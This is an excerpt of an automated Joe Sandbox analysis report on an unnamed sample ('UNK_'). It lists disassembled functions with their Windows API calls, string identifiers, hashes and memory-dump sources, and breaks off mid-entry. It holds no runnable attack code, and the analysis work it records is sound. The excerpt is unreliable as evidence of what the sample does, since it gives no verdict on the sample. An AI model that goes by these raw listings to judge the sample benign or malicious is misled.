                                                                                                                                        • API String ID: 1297703922-3619404913
                                                                                                                                        • Opcode ID: 740194276e40a54342dd1ed751d58aaf5678aa68e765b91774140fd36283e6b2
                                                                                                                                        • Instruction ID: 8d9f48a3aae24392d7f1a50d466efd3c369a677f137e20f1d081843de7a3861b
                                                                                                                                        • Opcode Fuzzy Hash: 740194276e40a54342dd1ed751d58aaf5678aa68e765b91774140fd36283e6b2
                                                                                                                                        • Instruction Fuzzy Hash: 8D71BE71140349AFDB25CF28CC85FA63BE9FB89744F54451CF9899B2A1D778E802CB15
                                                                                                                                        Function 007AB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 007AB46D
                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 007AB476
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007AB482
                                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007AB561
                                                                                                                                        • __swprintf.LIBCMT ref: 007AB591
                                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 007AB5BD
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007AB63F
                                                                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 007AB6D1
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007AB727
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007AB736
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 007AB772
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                        • API String ID: 3730832054-3931177956
                                                                                                                                        • Opcode ID: aed796b706548ab73e25cd870a3b13221c711f1ba21dfc96ea2aa53eaaf74751
                                                                                                                                        • Instruction ID: b055a085ff355ba5e76b570535045338df1fb9c3d838629f6bf0173bc385414b
                                                                                                                                        • Opcode Fuzzy Hash: aed796b706548ab73e25cd870a3b13221c711f1ba21dfc96ea2aa53eaaf74751
                                                                                                                                        • Instruction Fuzzy Hash: A2C1F371A00255EBCB209F65D488B69B7B4FF8B300F148655F8059B283CB7CEC54DB91
                                                                                                                                        Function 007C6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 007C6FF9
                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007C7044
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                        • API String ID: 3974292440-4258414348
                                                                                                                                        • Opcode ID: 82abd0180656dce697c9c964f8881bbe3fbf23d7a1a8079f90783299f522158e
                                                                                                                                        • Instruction ID: 2c3f8bfdfd06768c13eddd8e528da57996e0371940ee274369ebef612749bfb2
                                                                                                                                        • Opcode Fuzzy Hash: 82abd0180656dce697c9c964f8881bbe3fbf23d7a1a8079f90783299f522158e
                                                                                                                                        • Instruction Fuzzy Hash: 9C916074204201DFCA18EF14C855F69B7A2BF94350F14896DF9965B3A2CF39ED4ACB42
                                                                                                                                        Function 007CE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007CE3BB
                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007CBCBF), ref: 007CE417
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CE457
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CE49C
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CE4D3
                                                                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,007CBCBF), ref: 007CE4DF
                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007CE4EF
                                                                                                                                        • DestroyCursor.USER32(?), ref: 007CE4FE
                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007CE51B
                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007CE527
                                                                                                                                          • Part of subcall function 00781BC7: __wcsicmp_l.LIBCMT ref: 00781C50
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                        • API String ID: 3907162815-1154884017
                                                                                                                                        • Opcode ID: 3ed0c3118aa638c1978088f8840bbca4887e5bd76fb46f9443429600dc342780
                                                                                                                                        • Instruction ID: a77d0f87e6d22b6584375170712f134203198a4fca6f645cede04fb21c9ed2a1
                                                                                                                                        • Opcode Fuzzy Hash: 3ed0c3118aa638c1978088f8840bbca4887e5bd76fb46f9443429600dc342780
                                                                                                                                        • Instruction Fuzzy Hash: 38618F71540255FEEB24DF64CC86FBA77ACAB08720F108219F915EA1D1DB78EE91C760
                                                                                                                                        Function 007B0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 007B0EFF
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 007B0F0F
                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007B0F1B
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007B0F79
                                                                                                                                        • _wcscat.LIBCMT ref: 007B0F91
                                                                                                                                        • _wcscat.LIBCMT ref: 007B0FA3
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007B0FB8
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B0FCC
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B0FFE
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B101F
                                                                                                                                        • _wcscpy.LIBCMT ref: 007B102B
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007B106A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 3566783562-438819550
                                                                                                                                        • Opcode ID: 4881acae975e182044f97a08b188ebb62cf316bf4605963bc92f9d955f0efb23
                                                                                                                                        • Instruction ID: a0ae57da492df2d9950c8c8f4f5479990288ee0d1ad82a5ed852e35ecdb941c3
                                                                                                                                        • Opcode Fuzzy Hash: 4881acae975e182044f97a08b188ebb62cf316bf4605963bc92f9d955f0efb23
                                                                                                                                        • Instruction Fuzzy Hash: 68615CB2504345EFC710EF64C854A9BB7E8FF89310F04891AF999C7251EB39EA45CB92
                                                                                                                                        Function 007ADAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 007ADB26
                                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 007ADB73
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007ADBBB
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007ADBF2
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007ADC20
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                        • API String ID: 2698844021-4113822522
                                                                                                                                        • Opcode ID: f8e56e36c07cdbca3b29e3d015c4b5bc181d560c19f34c4b41e65438d24519bb
                                                                                                                                        • Instruction ID: 8a1eea2831793b4da23ee7cf629a6b89f134d3423c29745238c243e05d16f91a
                                                                                                                                        • Opcode Fuzzy Hash: f8e56e36c07cdbca3b29e3d015c4b5bc181d560c19f34c4b41e65438d24519bb
                                                                                                                                        • Instruction Fuzzy Hash: B5514C71108305DFC704EF14C98586AB7E9FF88758F40896CF89A97261EB79EE09CB52
                                                                                                                                        Function 007A3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007D4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 007A3145
                                                                                                                                        • LoadStringW.USER32(00000000,?,007D4085,00000016), ref: 007A314E
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,007D4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 007A3170
                                                                                                                                        • LoadStringW.USER32(00000000,?,007D4085,00000016), ref: 007A3173
                                                                                                                                        • __swprintf.LIBCMT ref: 007A31B3
                                                                                                                                        • __swprintf.LIBCMT ref: 007A31C5
                                                                                                                                        • _wprintf.LIBCMT ref: 007A326C
                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007A3283
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                        • API String ID: 984253442-2268648507
                                                                                                                                        • Opcode ID: c4a16d187a342b2bff98e9f579e062f4d46dd27522447c3771a2f28bde2545e8
                                                                                                                                        • Instruction ID: e71b376d2e48232c80cf39f99a3b8784101b4ffc0098910df10a268e7f13ab30
                                                                                                                                        • Opcode Fuzzy Hash: c4a16d187a342b2bff98e9f579e062f4d46dd27522447c3771a2f28bde2545e8
                                                                                                                                        • Instruction Fuzzy Hash: E4417271904209FACB14FBE0DD9BEEEB77CAF54741F104165F606B21A2DA6D6F04CA60
                                                                                                                                        Function 007AD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 007AD96C
                                                                                                                                        • __swprintf.LIBCMT ref: 007AD98E
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 007AD9CB
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007AD9F0
                                                                                                                                        • _memset.LIBCMT ref: 007ADA0F
                                                                                                                                        • _wcsncpy.LIBCMT ref: 007ADA4B
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 007ADA80
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007ADA8B
                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 007ADA94
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007ADA9E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                        • API String ID: 2733774712-3457252023
                                                                                                                                        • Opcode ID: 8138aa570cd4534479095a992be09ac3fac6063b7de2f9b2b3ca3229512f7e97
                                                                                                                                        • Instruction ID: 58aa5136f4c5de1e9d51111bf8cc8fccbd9d2d7ea5a185b5a307a3db2578fec7
                                                                                                                                        • Opcode Fuzzy Hash: 8138aa570cd4534479095a992be09ac3fac6063b7de2f9b2b3ca3229512f7e97
                                                                                                                                        • Instruction Fuzzy Hash: 3D319371600248AADB30DFA4DC89FDA77BCFF89700F00C2A5F515D6061E7749E418BA5
                                                                                                                                        Function 007CE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007CBD04,?,?), ref: 007CE564
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007CBD04,?,?,00000000,?), ref: 007CE57B
                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007CBD04,?,?,00000000,?), ref: 007CE586
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,007CBD04,?,?,00000000,?), ref: 007CE593
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 007CE59C
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007CBD04,?,?,00000000,?), ref: 007CE5AB
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 007CE5B4
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,007CBD04,?,?,00000000,?), ref: 007CE5BB
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007CE5CC
                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,007ED9BC,?), ref: 007CE5E5
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 007CE5F5
                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 007CE619
                                                                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007CE644
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007CE66C
                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007CE682
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3840717409-0
                                                                                                                                        • Opcode ID: 385adc1ed549c9ecf9a1bf3bb91b2ac58607e3268f09ae2cf2bd4550623746bb
                                                                                                                                        • Instruction ID: 429f4e1cef9f6094171f1cd3b0e00bb4fcd0b5b99c34bb482547b1ab2d696cc1
                                                                                                                                        • Opcode Fuzzy Hash: 385adc1ed549c9ecf9a1bf3bb91b2ac58607e3268f09ae2cf2bd4550623746bb
                                                                                                                                        • Instruction Fuzzy Hash: 45416B75601248FFDB219F64DC88EAABBB8FF89711F108058F905EB260D7399D00DB24
                                                                                                                                        Function 007B0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007B0C93
                                                                                                                                        • _wcscat.LIBCMT ref: 007B0CAB
                                                                                                                                        • _wcscat.LIBCMT ref: 007B0CBD
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007B0CD2
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B0CE6
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 007B0CFE
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 007B0D18
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007B0D2A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 34673085-438819550
                                                                                                                                        • Opcode ID: fbbc3711e596034035d402ae3e97d25c72f7d183bf886ac3d17168f97114228e
                                                                                                                                        • Instruction ID: b6f01a3ec2b6744407259f65dab5a57bcdd55b5a5dcaff5452260bf981c500c8
                                                                                                                                        • Opcode Fuzzy Hash: fbbc3711e596034035d402ae3e97d25c72f7d183bf886ac3d17168f97114228e
                                                                                                                                        • Instruction Fuzzy Hash: B98166716043459FC764DF64C845AEBB7E8BF88314F14892AF885C7251EB38ED45CBA2
                                                                                                                                        Function 0079B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0079B903
                                                                                                                                          • Part of subcall function 0079B8E7: GetLastError.KERNEL32(?,0079B3CB,?,?,?), ref: 0079B90D
                                                                                                                                          • Part of subcall function 0079B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0079B3CB,?,?,?), ref: 0079B91C
                                                                                                                                          • Part of subcall function 0079B8E7: RtlAllocateHeap.NTDLL(00000000,?,0079B3CB), ref: 0079B923
                                                                                                                                          • Part of subcall function 0079B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0079B93A
                                                                                                                                          • Part of subcall function 0079B982: GetProcessHeap.KERNEL32(00000008,0079B3E1,00000000,00000000,?,0079B3E1,?), ref: 0079B98E
                                                                                                                                          • Part of subcall function 0079B982: RtlAllocateHeap.NTDLL(00000000,?,0079B3E1), ref: 0079B995
                                                                                                                                          • Part of subcall function 0079B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0079B3E1,?), ref: 0079B9A6
                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0079B5F7
                                                                                                                                        • _memset.LIBCMT ref: 0079B60C
                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079B62B
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 0079B63C
                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0079B679
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0079B695
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 0079B6B2
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0079B6C1
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0079B6C8
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0079B6E9
                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 0079B6F0
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0079B721
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0079B747
                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0079B75B
                                                                                                                                        Memory Dump Source
